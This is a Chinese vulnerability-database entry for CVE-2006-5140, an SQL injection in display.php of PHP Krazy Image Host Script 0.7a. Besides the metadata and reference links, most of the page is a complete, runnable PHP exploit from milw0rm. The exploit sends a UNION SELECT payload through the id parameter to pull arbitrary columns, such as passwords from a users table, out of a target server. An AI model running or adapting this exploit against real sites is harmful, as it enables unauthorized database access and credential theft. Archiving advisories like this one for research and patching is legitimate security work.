PHP Krazy Image Host Script 'Display.PHP' SQL注入漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1111170 漏洞类型 SQL注入
发布时间 2006-09-29 更新时间 2006-10-18
CVE编号 CVE-2006-5140 CNNVD-ID CNNVD-200610-020
漏洞平台 PHP CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/2456
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200610-020
|漏洞详情
Lappy512PHPKrazyImageHostScript(phpkimagehost)0.7a的display.php中存在SQL注入漏洞。远程攻击者可以通过id参数执行任意SQL命令。
|漏洞EXP
<?
/*****************************************************************\
|* PHP Krazy Image Host Script (id) Remote SQL Injection Exploit *|
|* Discovered by: Trex                                           *|
|* Solution: http://www.trex-online.net/fixes/display.rar        *|
|* Visit: Trex-Online.net / UnderGround.ag                       *|
\*****************************************************************/

error_reporting(0);

echo "# PHP Krazy Image Host Script (id) Remote SQL Injection Exploit\n";
echo "# Discovered by: Trex\n";
echo "# Solution: http://www.trex-online.net/fixes/display.rar\n";
echo "# Visit: Trex-Online.net / UnderGround.ag\n\n";
echo "# Usage: $ php " . $_SERVER['PHP_SELF'] . " [URL] [PATH] [SELECT] [FROM] [WHERE]\n";
echo "# Example: $ php " . $_SERVER['PHP_SELF'] . " http://localhost /images/ password users userID=1\n\n";

if (!$_SERVER['argv'][5])
	die();

$url = parse_url($_SERVER['argv'][1] . $_SERVER['argv'][2]);

$sql = "UNION+SELECT+1,1,1,1," . $_SERVER['argv'][3] . ",1,1,1+FROM+" . $_SERVER['argv'][4] . "+WHERE+" . $_SERVER['argv'][5] . "/*";

echo "Connecting to " . $url['host'] . ":80 ... ";

if (!$fsp = fsockopen($url['host'], 80, $errno, $errstr, $timeout))
	die("failed.\nReason: " . $errno . " - " . $errstr);

echo "done.\n\n";

$request  = "HEAD " . $url['path'] . "display.php?id=0+" . $sql . " HTTP/1.1\r\n";
$request .= "Host: " . $url['host'] . "\r\n";
$request .= "Connection: Close\r\n\r\n";

fputs($fsp, $request);

while (!feof($fsp)) {
	$response = fgets($fsp, 4096);
	$response = explode(":", $response, 2);

	if (count($response) == 2 && preg_match("/Content-Type/", $response[0]))
		$result = $response[1];
}

if (preg_match("/text\/html/", $result))
	echo "Exploit failed!";
else
	echo "Result: " . $result;
?>

# milw0rm.com [2006-09-29]
|参考资料

来源:XF
名称:phpkrazyimage-display-sql-injection(29270)
链接:http://xforce.iss.net/xforce/xfdb/29270
来源:BID
名称:20270
链接:http://www.securityfocus.com/bid/20270
来源:MILW0RM
名称:2456
链接:http://www.milw0rm.com/exploits/2456
来源:MILW0RM
名称:2456
链接:http://milw0rm.com/exploits/2456